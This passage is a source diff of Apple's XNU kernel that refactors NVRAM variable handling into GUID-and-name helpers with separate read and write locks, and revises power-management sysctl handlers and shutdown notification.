-       theObject.reset(dict->getObject(variableName), OSRetain);
+       NVRAMREADLOCK();
+       theObject.reset(dict->getObject(name), OSRetain);
        NVRAMUNLOCK();
 
        if (theObject != nullptr) {
@@ -1185,6 +1251,22 @@ exit:
        return theObject;
 }
 
+OSSharedPtr<OSObject>
+IODTNVRAM::copyProperty(const OSSymbol *aKey) const
+{
+       const char            *variableName;
+       uuid_t                varGuid;
+
+       if (skipKey(aKey)) {
+               return nullptr;
+       }
+       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
+
+       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
+
+       return copyPropertyWithGUIDAndName(&varGuid, variableName);
+}
+
 OSSharedPtr<OSObject>
 IODTNVRAM::copyProperty(const char *aKey) const
 {
@@ -1220,64 +1302,64 @@ IODTNVRAM::getProperty(const char *aKey) const
 }
 
 IOReturn
-IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
+IODTNVRAM::setPropertyWithGUIDAndName(const uuid_t *guid, const char *name, OSObject *anObject)
 {
-       IOReturn              result = kIOReturnSuccess;
+       IOReturn              ret = kIOReturnSuccess;
        bool                  remove = false;
        OSString              *tmpString = nullptr;
        OSSharedPtr<OSObject> propObject, oldObject;
        OSSharedPtr<OSObject> sharedObject(anObject, OSRetain);
-       const char            *variableName;
-       uuid_t                varGuid;
        OSDictionary          *dict;
        bool                  deletePropertyKey, syncNowPropertyKey, forceSyncNowPropertyKey;
        bool                  ok;
        size_t                propDataSize = 0;
 
-       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
-
-       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
-       deletePropertyKey = strncmp(variableName, kIONVRAMDeletePropertyKey, sizeof(kIONVRAMDeletePropertyKey)) == 0;
-       syncNowPropertyKey = strncmp(variableName, kIONVRAMSyncNowPropertyKey, sizeof(kIONVRAMSyncNowPropertyKey)) == 0;
-       forceSyncNowPropertyKey = strncmp(variableName, kIONVRAMForceSyncNowPropertyKey, sizeof(kIONVRAMForceSyncNowPropertyKey)) == 0;
+       deletePropertyKey = strncmp(name, kIONVRAMDeletePropertyKey, sizeof(kIONVRAMDeletePropertyKey)) == 0;
+       syncNowPropertyKey = strncmp(name, kIONVRAMSyncNowPropertyKey, sizeof(kIONVRAMSyncNowPropertyKey)) == 0;
+       forceSyncNowPropertyKey = strncmp(name, kIONVRAMForceSyncNowPropertyKey, sizeof(kIONVRAMForceSyncNowPropertyKey)) == 0;
 
        if (deletePropertyKey) {
                tmpString = OSDynamicCast(OSString, anObject);
                if (tmpString != nullptr) {
+                       const char *variableName;
+                       uuid_t     varGuid;
+
                        DEBUG_INFO("kIONVRAMDeletePropertyKey found\n");
-                       OSSharedPtr<const OSSymbol> sharedKey = OSSymbol::withString(tmpString);
-                       removeProperty(sharedKey.get());
+
+                       parseVariableName(tmpString->getCStringNoCopy(), &varGuid, &variableName);
+                       removePropertyWithGUIDAndName(&varGuid, variableName);
                } else {
                        DEBUG_INFO("kIONVRAMDeletePropertyKey value needs to be an OSString\n");
-                       result = kIOReturnError;
+                       ret = kIOReturnError;
                }
                goto exit;
        } else if (syncNowPropertyKey || forceSyncNowPropertyKey) {
                tmpString = OSDynamicCast(OSString, anObject);
-               DEBUG_INFO("NVRAM sync key %s found\n", aKey->getCStringNoCopy());
+               DEBUG_INFO("NVRAM sync key %s found\n", name);
                if (tmpString != nullptr) {
                        // We still want to throttle NVRAM commit rate for SyncNow. ForceSyncNow is provided as a really big hammer.
                        syncInternal(syncNowPropertyKey);
                } else {
-                       DEBUG_INFO("%s value needs to be an OSString\n", variableName);
-                       result = kIOReturnError;
+                       DEBUG_INFO("%s value needs to be an OSString\n", name);
+                       ret = kIOReturnError;
                }
                goto exit;
        }
 
-       result = chooseDictionary(kIONVRAMOperationWrite, &varGuid, variableName, &dict);
-       if (result != kIOReturnSuccess) {
+       ret = chooseDictionary(kIONVRAMOperationWrite, guid, name, &dict);
+       if (ret != kIOReturnSuccess) {
+               DEBUG_INFO("No dictionary\n");
                goto exit;
        }
 
-       if (!verifyPermission(kIONVRAMOperationWrite, &varGuid, variableName)) {
+       if (!verifyPermission(kIONVRAMOperationWrite, guid, name)) {
                DEBUG_INFO("Not privileged\n");
-               result = kIOReturnNotPrivileged;
+               ret = kIOReturnNotPrivileged;
                goto exit;
        }
 
        // Make sure the object is of the correct type.
-       switch (getVariableType(variableName)) {
+       switch (getVariableType(name)) {
        case kOFVariableTypeBoolean:
                propObject = OSDynamicPtrCast<OSBoolean>(sharedObject);
                break;
@@ -1291,9 +1373,9 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
                if (propObject != nullptr) {
                        propDataSize = (OSDynamicPtrCast<OSString>(propObject))->getLength();
 
-                       if (aKey->isEqualTo(kIONVRAMBootArgsKey) && (propDataSize >= BOOT_LINE_LENGTH)) {
+                       if ((strncmp(name, kIONVRAMBootArgsKey, sizeof(kIONVRAMBootArgsKey)) == 0) && (propDataSize >= BOOT_LINE_LENGTH)) {
                                DEBUG_ERROR("boot-args size too large for BOOT_LINE_LENGTH, propDataSize=%zu\n", propDataSize);
-                               result = kIOReturnNoSpace;
+                               ret = kIOReturnNoSpace;
                                goto exit;
                        }
                }
@@ -1325,18 +1407,18 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
 
        if (propObject == nullptr) {
                DEBUG_INFO("No property object\n");
-               result = kIOReturnBadArgument;
+               ret = kIOReturnBadArgument;
                goto exit;
        }
 
-       if (!verifyWriteSizeLimit(&varGuid, variableName, propDataSize)) {
-               DEBUG_ERROR("Property data size of %zu too long for %s\n", propDataSize, variableName);
-               result = kIOReturnNoSpace;
+       if (!verifyWriteSizeLimit(guid, name, propDataSize)) {
+               DEBUG_ERROR("Property data size of %zu too long for %s\n", propDataSize, name);
+               ret = kIOReturnNoSpace;
                goto exit;
        }
 
-       NVRAMLOCK();
-       ok = handleSpecialVariables(variableName, &varGuid, propObject.get(), &result);
+       NVRAMWRITELOCK();
+       ok = handleSpecialVariables(name, guid, propObject.get(), &ret);
        NVRAMUNLOCK();
 
        if (ok) {
@@ -1344,39 +1426,42 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
                goto exit;
        }
 
-       NVRAMLOCK();
-       oldObject.reset(dict->getObject(variableName), OSRetain);
+       NVRAMREADLOCK();
+       oldObject.reset(dict->getObject(name), OSRetain);
+       NVRAMUNLOCK();
+
        if (remove == false) {
                DEBUG_INFO("Adding object\n");
-               if (!dict->setObject(variableName, propObject.get())) {
-                       result = kIOReturnBadArgument;
+               NVRAMWRITELOCK();
+               if (!dict->setObject(name, propObject.get())) {
+                       ret = kIOReturnBadArgument;
                }
+               NVRAMUNLOCK();
        } else {
                DEBUG_INFO("Removing object\n");
                // Check for existence so we can decide whether we need to sync variables
                if (oldObject) {
-                       result = removePropertyInternal(aKey);
+                       ret = removePropertyWithGUIDAndName(guid, name);
                } else {
-                       result = kIOReturnNotFound;
+                       ret = kIOReturnNotFound;
                }
        }
-       NVRAMUNLOCK();
 
-       if (result == kIOReturnSuccess) {
-               result = serializeVariables();
-               if (result != kIOReturnSuccess) {
-                       DEBUG_ERROR("serializeVariables failed, result=0x%08x\n", result);
+       if (ret == kIOReturnSuccess) {
+               ret = serializeVariables();
+               if (ret != kIOReturnSuccess) {
+                       DEBUG_ERROR("serializeVariables failed, ret=%#08x\n", ret);
 
-                       NVRAMLOCK();
+                       NVRAMWRITELOCK();
                        if (oldObject) {
-                               dict->setObject(variableName, oldObject.get());
+                               dict->setObject(name, oldObject.get());
                        } else {
-                               dict->removeObject(variableName);
+                               dict->removeObject(name);
                        }
                        NVRAMUNLOCK();
 
                        (void) serializeVariables();
-                       result = kIOReturnNoMemory;
+                       ret = kIOReturnNoMemory;
                }
        }
 
@@ -1388,9 +1473,22 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
        }
 
 exit:
-       DEBUG_INFO("result=0x%08x\n", result);
+       DEBUG_INFO("ret=%#08x\n", ret);
 
-       return result;
+       return ret;
+}
+
+IOReturn
+IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject)
+{
+       const char            *variableName;
+       uuid_t                varGuid;
+
+       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
+
+       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
+
+       return setPropertyWithGUIDAndName(&varGuid, variableName, anObject);
 }
 
 bool
@@ -1404,55 +1502,77 @@ IODTNVRAM::removeProperty(const OSSymbol *aKey)
 {
        IOReturn ret;
 
-       NVRAMLOCK();
        ret = removePropertyInternal(aKey);
-       NVRAMUNLOCK();
 
        if (ret == kIOReturnSuccess) {
                serializeVariables();
        } else {
-               DEBUG_INFO("removePropertyInternal failed, ret=0x%08x\n", ret);
+               DEBUG_INFO("removePropertyInternal failed, ret=%#08x\n", ret);
        }
 }
 
 IOReturn
-IODTNVRAM::removePropertyInternal(const OSSymbol *aKey)
+IODTNVRAM::removePropertyWithGUIDAndName(const uuid_t *guid, const char *name)
 {
-       IOReturn     result;
-       const char   *variableName;
-       uuid_t       varGuid;
+       IOReturn     ret;
        OSDictionary *dict;
+       bool removed = false;
 
-       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
-
-       NVRAMLOCKASSERT();
-
-       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
+       DEBUG_INFO("name=%s\n", name);
 
-       result = chooseDictionary(kIONVRAMOperationDelete, &varGuid, variableName, &dict);
-       if (result != kIOReturnSuccess) {
+       ret = chooseDictionary(kIONVRAMOperationDelete, guid, name, &dict);
+       if (ret != kIOReturnSuccess) {
+               DEBUG_INFO("No dictionary\n");
                goto exit;
        }
 
-       if (!verifyPermission(kIONVRAMOperationDelete, &varGuid, variableName)) {
+       if (!verifyPermission(kIONVRAMOperationDelete, guid, name)) {
                DEBUG_INFO("Not priveleged\n");
-               result = kIOReturnNotPrivileged;
+               ret = kIOReturnNotPrivileged;
                goto exit;
        }
 
+       NVRAMWRITELOCK();
+
        // If the object exists, remove it from the dictionary.
-       if (dict->getObject(variableName) != nullptr) {
-               dict->removeObject(variableName);
+       if (dict->getObject(name) != nullptr) {
+               dict->removeObject(name);
+               removed = true;
+       } else {
+               DEBUG_INFO("%s not found\n", name);
+       }
+
+       NVRAMUNLOCK();
+
+       if (removed) {
+               ret = serializeVariables();
+               DEBUG_INFO("serializeVariables ret=0x%08x\n", ret);
        }
 
 exit:
-       return result;
+       return ret;
+}
+
+IOReturn
+IODTNVRAM::removePropertyInternal(const OSSymbol *aKey)
+{
+       IOReturn     ret;
+       const char   *variableName;
+       uuid_t       varGuid;
+
+       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
+
+       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
+
+       ret = removePropertyWithGUIDAndName(&varGuid, variableName);
+
+       return ret;
 }
 
 IOReturn
 IODTNVRAM::setProperties(OSObject *properties)
 {
-       IOReturn                          result = kIOReturnSuccess;
+       IOReturn                          ret = kIOReturnSuccess;
        OSObject                          *object;
        const OSSymbol                    *key;
        OSDictionary                      *dict;
@@ -1470,7 +1590,7 @@ IODTNVRAM::setProperties(OSObject *properties)
                return kIOReturnBadArgument;
        }
 
-       while (result == kIOReturnSuccess) {
+       while (ret == kIOReturnSuccess) {
                key = OSDynamicCast(OSSymbol, iter->getNextObject());
                if (key == nullptr) {
                        break;
@@ -1481,12 +1601,12 @@ IODTNVRAM::setProperties(OSObject *properties)
                        continue;
                }
 
-               result = setPropertyInternal(key, object);
+               ret = setPropertyInternal(key, object);
        }
 
-       DEBUG_INFO("result=0x%08x\n", result);
+       DEBUG_INFO("ret=%#08x\n", ret);
 
-       return result;
+       return ret;
 }
 
 IOReturn
@@ -1634,8 +1754,8 @@ IODTNVRAM::initVariables(void)
        OSSharedPtr<const OSSymbol> propSymbol;
        OSSharedPtr<OSObject>       propObject;
        NVRAMRegionInfo             *currentRegion;
-       NVRAMRegionInfo             variableRegions[] = { { NVRAM_CHRP_PARTITION_NAME_COMMON, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage},
-                                                         { NVRAM_CHRP_PARTITION_NAME_SYSTEM, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} };
+       NVRAMRegionInfo             variableRegions[] = { { kIONVRAMPartitionCommon, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage},
+                                                         { kIONVRAMPartitionSystem, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} };
 
        DEBUG_INFO("...\n");
 
@@ -1648,7 +1768,7 @@ IODTNVRAM::initVariables(void)
 
                currentRegion->dict = OSDictionary::withCapacity(1);
 
-               DEBUG_INFO("region = %s\n", currentRegion->name);
+               DEBUG_INFO("region = %d\n", currentRegion->type);
                cnt = 0;
                while (cnt < currentRegion->size) {
                        // Break if there is no name.
@@ -1695,14 +1815,23 @@ IODTNVRAM::initVariables(void)
        }
 
        // Create the boot-args property if it is not in the dictionary.
-       if (_commonDict->getObject(kIONVRAMBootArgsKey) == nullptr) {
-               propObject = OSString::withCStringNoCopy("");
-               if (propObject != nullptr) {
-                       _commonDict->setObject(kIONVRAMBootArgsKey, propObject.get());
+       if (_systemDict != nullptr) {
+               if (_systemDict->getObject(kIONVRAMBootArgsKey) == nullptr) {
+                       propObject = OSString::withCStringNoCopy("");
+                       if (propObject != nullptr) {
+                               _systemDict->setObject(kIONVRAMBootArgsKey, propObject.get());
+                       }
+               }
+       } else if (_commonDict != nullptr) {
+               if (_commonDict->getObject(kIONVRAMBootArgsKey) == nullptr) {
+                       propObject = OSString::withCStringNoCopy("");
+                       if (propObject != nullptr) {
+                               _commonDict->setObject(kIONVRAMBootArgsKey, propObject.get());
+                       }
                }
        }
 
-       DEBUG_INFO("%s _commonDict=%p _systemDict=%p\n", __FUNCTION__, _commonDict.get(), _systemDict.get());
+       DEBUG_INFO("%s _commonDict=%p _systemDict=%p\n", __FUNCTION__, _commonDict ? _commonDict.get() : nullptr, _systemDict ? _systemDict.get() : nullptr);
 
        return kIOReturnSuccess;
 }
@@ -1728,8 +1857,8 @@ IODTNVRAM::serializeVariables(void)
        UInt32                            commonUsed = 0;
        OSSharedPtr<OSData>               nvramImage;
        NVRAMRegionInfo                   *currentRegion;
-       NVRAMRegionInfo                   variableRegions[] = { { NVRAM_CHRP_PARTITION_NAME_COMMON, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage},
-                                                               { NVRAM_CHRP_PARTITION_NAME_SYSTEM, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} };
+       NVRAMRegionInfo                   variableRegions[] = { { kIONVRAMPartitionCommon, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage},
+                                                               { kIONVRAMPartitionSystem, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} };
 
        if (_systemPanicked) {
                return kIOReturnNotReady;
@@ -1742,7 +1871,7 @@ IODTNVRAM::serializeVariables(void)
 
        DEBUG_INFO("...\n");
 
-       NVRAMLOCK();
+       NVRAMREADLOCK();
 
        for (regionIndex = 0; regionIndex < ARRAY_SIZE(variableRegions); regionIndex++) {
                currentRegion = &variableRegions[regionIndex];
@@ -1751,10 +1880,12 @@ IODTNVRAM::serializeVariables(void)
                        continue;
                }
 
-               DEBUG_INFO("region = %s\n", currentRegion->name);
+               DEBUG_INFO("region = %d\n", currentRegion->type);
                buffer = tmpBuffer = IONew(UInt8, currentRegion->size);
                if (buffer == nullptr) {
-                       return kIOReturnNoMemory;
+                       ok = false;
+                       ret = kIOReturnNoMemory;
+                       break;
                }
                bzero(buffer, currentRegion->size);
 
@@ -1790,44 +1921,48 @@ IODTNVRAM::serializeVariables(void)
 
                IODelete(buffer, UInt8, currentRegion->size);
 
-               if ((strncmp(currentRegion->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM)) == 0) &&
+               if ((currentRegion->type == kIONVRAMPartitionSystem) &&
                    (_systemService != nullptr)) {
-                       _systemService->setProperties(_systemDict.get());
-                       systemUsed = maxLength;
-               } else if ((strncmp(currentRegion->name, NVRAM_CHRP_PARTITION_NAME_COMMON, strlen(NVRAM_CHRP_PARTITION_NAME_COMMON)) == 0) &&
+                       _systemService->setVariables(_systemDict.get());
+                       systemUsed = (uint32_t)(tmpBuffer - buffer);
+               } else if ((currentRegion->type == kIONVRAMPartitionCommon) &&
                    (_commonService != nullptr)) {
-                       _commonService->setProperties(_commonDict.get());
-                       commonUsed = maxLength;
+                       _commonService->setVariables(_commonDict.get());
+                       commonUsed = (uint32_t)(tmpBuffer - buffer);
                }
 
                if (!ok) {
-                       return kIOReturnBadArgument;
+                       ret = kIOReturnBadArgument;
+                       break;
                }
        }
 
-       nvramImage = OSData::withBytes(_nvramImage, _nvramSize);
-
        NVRAMUNLOCK();
 
        DEBUG_INFO("ok=%d\n", ok);
 
-       CONTROLLERLOCK();
+       if (ok) {
+               nvramImage = OSData::withBytes(_nvramImage, _nvramSize);
+               CONTROLLERLOCK();
 
-       if (_systemService) {
-               sizeUsed = OSNumber::withNumber(systemUsed, 32);
-               _nvramController->setProperty("SystemUsed", sizeUsed.get());
-               sizeUsed.reset();
-       }
+               if (_systemService) {
+                       sizeUsed = OSNumber::withNumber(systemUsed, 32);
+                       _nvramController->setProperty("SystemUsed", sizeUsed.get());
+                       DEBUG_INFO("SystemUsed=%u\n", (unsigned int)commonUsed);
+                       sizeUsed.reset();
+               }
 
-       if (_commonService) {
-               sizeUsed = OSNumber::withNumber(commonUsed, 32);
-               _nvramController->setProperty("CommonUsed", sizeUsed.get());
-               sizeUsed.reset();
-       }
+               if (_commonService) {
+                       sizeUsed = OSNumber::withNumber(commonUsed, 32);
+                       _nvramController->setProperty("CommonUsed", sizeUsed.get());
+                       DEBUG_INFO("CommonUsed=%u\n", (unsigned int)commonUsed);
+                       sizeUsed.reset();
+               }
 
-       ret = _nvramController->write(0, (uint8_t *)nvramImage->getBytesNoCopy(), nvramImage->getLength());
+               ret = _nvramController->write(0, (uint8_t *)nvramImage->getBytesNoCopy(), nvramImage->getLength());
 
-       CONTROLLERUNLOCK();
+               CONTROLLERUNLOCK();
+       }
 
        return ret;
 }
@@ -1932,11 +2067,11 @@ IODTNVRAM::convertPropToObject(UInt8 *propName, UInt32 propNameLength,
 {
        const OSSymbol* propSymbolRaw = nullptr;
        OSObject* propObjectRaw = nullptr;
-       bool result = convertPropToObject(propName, propNameLength, propData, propDataLength,
+       bool ok = convertPropToObject(propName, propNameLength, propData, propDataLength,
            &propSymbolRaw, &propObjectRaw);
        propSymbol.reset(propSymbolRaw, OSNoRetain);
        propObject.reset(propObjectRaw, OSNoRetain);
-       return result;
+       return ok;
 }
 
 bool
@@ -2020,7 +2155,7 @@ IODTNVRAM::convertObjectToProp(UInt8 *buffer, UInt32 *length,
                } else if (tmpValue < 1000) {
                        snprintf((char *)buffer, remaining, "%d", (uint32_t)tmpValue);
                } else {
-                       snprintf((char *)buffer, remaining, "0x%x", (uint32_t)tmpValue);
+                       snprintf((char *)buffer, remaining, "%#x", (uint32_t)tmpValue);
                }
        }
        break;
@@ -2226,7 +2361,7 @@ IODTNVRAM::readNVRAMPropertyType1(IORegistryEntry *entry,
        UInt32       resultValueLen = 0;
        UInt8       byte;
 
-       NVRAMLOCK();
+       NVRAMREADLOCK();
        data = OSDynamicCast(OSData, _commonDict->getObject(_registryPropertiesKey.get()));
        NVRAMUNLOCK();
 
@@ -2300,7 +2435,7 @@ IODTNVRAM::writeNVRAMPropertyType1(IORegistryEntry *entry,
 
        // copy over existing properties for other entries
 
-       NVRAMLOCK();
+       NVRAMWRITELOCK();
 
        oldData.reset(OSDynamicCast(OSData, _commonDict->getObject(_registryPropertiesKey.get())), OSRetain);
        if (oldData) {
@@ -2403,7 +2538,7 @@ IODTNVRAM::writeNVRAMPropertyType1(IORegistryEntry *entry,
 
        if (ok) {
                if (serializeVariables() != kIOReturnSuccess) {
-                       NVRAMLOCK();
+                       NVRAMWRITELOCK();
                        if (oldData) {
                                _commonDict->setObject(_registryPropertiesKey.get(), oldData.get());
                        } else {
index 4fd29c33694a61476ec6622277c2084f07e2a028..48c09e32432fdb73b4ae2cb5d23107a6c99b3793 100644 (file)
 
 #define super IOService
 OSDefineMetaClassAndAbstractStructors(IOPMGR, IOService);
+
+void
+IOPMGR::enableCPUCore(unsigned int cpu_id, uint64_t entry_pa)
+{
+       // Fall back to the legacy method if the subclass doesn't override the
+       // new method.
+       enableCPUCore(cpu_id);
+}
+
+void
+IOPMGR::enableCPUCore(unsigned int cpu_id)
+{
+       panic("enableCPUCore is unimplemented");
+}
index ed78c3d76c4e267ba981d335ffd4bb8409a91c9d..4231fad39c5a9c75c5efba53b91c105ca4897cd4 100644 (file)
@@ -54,6 +54,7 @@
 #include <IOKit/IOReportMacros.h>
 #include <IOKit/IOLib.h>
 #include <IOKit/IOKitKeys.h>
+#include <IOKit/IOUserServer.h>
 #include "IOKitKernelInternal.h"
 #if HIBERNATION
 #include <IOKit/IOHibernatePrivate.h>
@@ -519,8 +520,8 @@ static UInt32           gWillShutdown = 0;
 static UInt32           gPagingOff = 0;
 static UInt32           gSleepWakeUUIDIsSet = false;
 static uint32_t         gAggressivesState = 0;
-static uint32_t         gHaltTimeMaxLog;
-static uint32_t         gHaltTimeMaxPanic;
+uint32_t                gHaltTimeMaxLog;
+uint32_t                gHaltTimeMaxPanic;
 IOLock *                gHaltLogLock;
 static char *           gHaltLog;
 enum                  { kHaltLogSize = 2048 };
@@ -605,6 +606,7 @@ static char gShutdownReasonString[80];
 static bool gWakeReasonSysctlRegistered = false;
 static bool gBootReasonSysctlRegistered = false;
 static bool gShutdownReasonSysctlRegistered = false;
+static bool gWillShutdownSysctlRegistered = false;
 static AbsoluteTime gUserActiveAbsTime;
 static AbsoluteTime gUserInactiveAbsTime;
 
@@ -977,6 +979,18 @@ IOSystemShutdownNotification(int stage)
                return;
        }
 
+       if (kIOSystemShutdownNotificationTerminateDEXTs == stage) {
+               uint64_t nano, millis;
+               startTime = mach_absolute_time();
+               IOServicePH::systemHalt();
+               absolutetime_to_nanoseconds(mach_absolute_time() - startTime, &nano);
+               millis = nano / NSEC_PER_MSEC;
+               if (true || (gHaltTimeMaxLog && (millis >= gHaltTimeMaxLog))) {
+                       printf("IOServicePH::systemHalt took %qd ms\n", millis);
+               }
+               return;
+       }
+
        assert(kIOSystemShutdownNotificationStageProcessExit == stage);
 
        IOLockLock(gHaltLogLock);
@@ -1002,7 +1016,6 @@ IOSystemShutdownNotification(int stage)
        }
 }
 
-
 extern "C" int sync_internal(void);
 
 /*
@@ -1171,11 +1184,11 @@ sysctl_sleepwaketime SYSCTL_HANDLER_ARGS
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, sleeptime,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &gIOLastUserSleepTime, 0, sysctl_sleepwaketime, "S,timeval", "");
 
 static SYSCTL_PROC(_kern, OID_AUTO, waketime,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &gIOLastWakeTime, 0, sysctl_sleepwaketime, "S,timeval", "");
 
 SYSCTL_QUAD(_kern, OID_AUTO, wake_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &gIOLastWakeAbsTime, "");
@@ -1184,11 +1197,15 @@ SYSCTL_QUAD(_kern, OID_AUTO, useractive_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &
 SYSCTL_QUAD(_kern, OID_AUTO, userinactive_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &gUserInactiveAbsTime, "");
 
 static int
-sysctl_willshutdown
-(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req)
+sysctl_willshutdown SYSCTL_HANDLER_ARGS
 {
-       int new_value, changed;
-       int error = sysctl_io_number(req, gWillShutdown, sizeof(int), &new_value, &changed);
+       int new_value, changed, error;
+
+       if (!gWillShutdownSysctlRegistered) {
+               return ENOENT;
+       }
+
+       error = sysctl_io_number(req, gWillShutdown, sizeof(int), &new_value, &changed);
        if (changed) {
                if (!gWillShutdown && (new_value == 1)) {
                        IOPMRootDomainWillShutdown();
@@ -1200,12 +1217,9 @@ sysctl_willshutdown
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, willshutdown,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_willshutdown, "I", "");
 
-extern struct sysctl_oid sysctl__kern_iokittest;
-extern struct sysctl_oid sysctl__debug_iokit;
-
 #if defined(XNU_TARGET_OS_OSX)
 
 static int
@@ -1241,11 +1255,11 @@ sysctl_progressmeter
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, progressmeterenable,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_progressmeterenable, "I", "");
 
 static SYSCTL_PROC(_kern, OID_AUTO, progressmeter,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_progressmeter, "I", "");
 
 #endif /* defined(XNU_TARGET_OS_OSX) */
@@ -1269,7 +1283,7 @@ sysctl_consoleoptions
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, consoleoptions,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_consoleoptions, "I", "");
 
 
@@ -1280,7 +1294,7 @@ sysctl_progressoptions SYSCTL_HANDLER_ARGS
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, progressoptions,
-    CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
+    CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
     NULL, 0, sysctl_progressoptions, "S,vc_progress_user_options", "");
 
 
@@ -1290,20 +1304,32 @@ sysctl_wakereason SYSCTL_HANDLER_ARGS
        char wr[sizeof(gWakeReasonString)];
 
        wr[0] = '\0';
-       if (gRootDomain) {
+       if (gRootDomain && gWakeReasonSysctlRegistered) {
                gRootDomain->copyWakeReasonString(wr, sizeof(wr));
+       } else {
+               return ENOENT;
        }
 
        return sysctl_io_string(req, wr, 0, 0, NULL);
 }
 
 SYSCTL_PROC(_kern, OID_AUTO, wakereason,
-    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_wakereason, "A", "wakereason");
 
-SYSCTL_STRING(_kern, OID_AUTO, bootreason,
-    CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
-    gBootReasonString, sizeof(gBootReasonString), "");
+static int
+sysctl_bootreason SYSCTL_HANDLER_ARGS
+{
+       if (!os_atomic_load(&gBootReasonSysctlRegistered, acquire)) {
+               return ENOENT;
+       }
+
+       return sysctl_io_string(req, gBootReasonString, 0, 0, NULL);
+}
+
+SYSCTL_PROC(_kern, OID_AUTO, bootreason,
+    CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    NULL, 0, sysctl_bootreason, "A", "");
 
 static int
 sysctl_shutdownreason SYSCTL_HANDLER_ARGS
@@ -1311,15 +1337,17 @@ sysctl_shutdownreason SYSCTL_HANDLER_ARGS
        char sr[sizeof(gShutdownReasonString)];
 
        sr[0] = '\0';
-       if (gRootDomain) {
+       if (gRootDomain && gShutdownReasonSysctlRegistered) {
                gRootDomain->copyShutdownReasonString(sr, sizeof(sr));
+       } else {
+               return ENOENT;
        }
 
        return sysctl_io_string(req, sr, 0, 0, NULL);
 }
 
 SYSCTL_PROC(_kern, OID_AUTO, shutdownreason,
-    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_shutdownreason, "A", "shutdownreason");
 
 static int
@@ -1341,7 +1369,7 @@ sysctl_targettype SYSCTL_HANDLER_ARGS
 }
 
 SYSCTL_PROC(_hw, OID_AUTO, targettype,
-    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
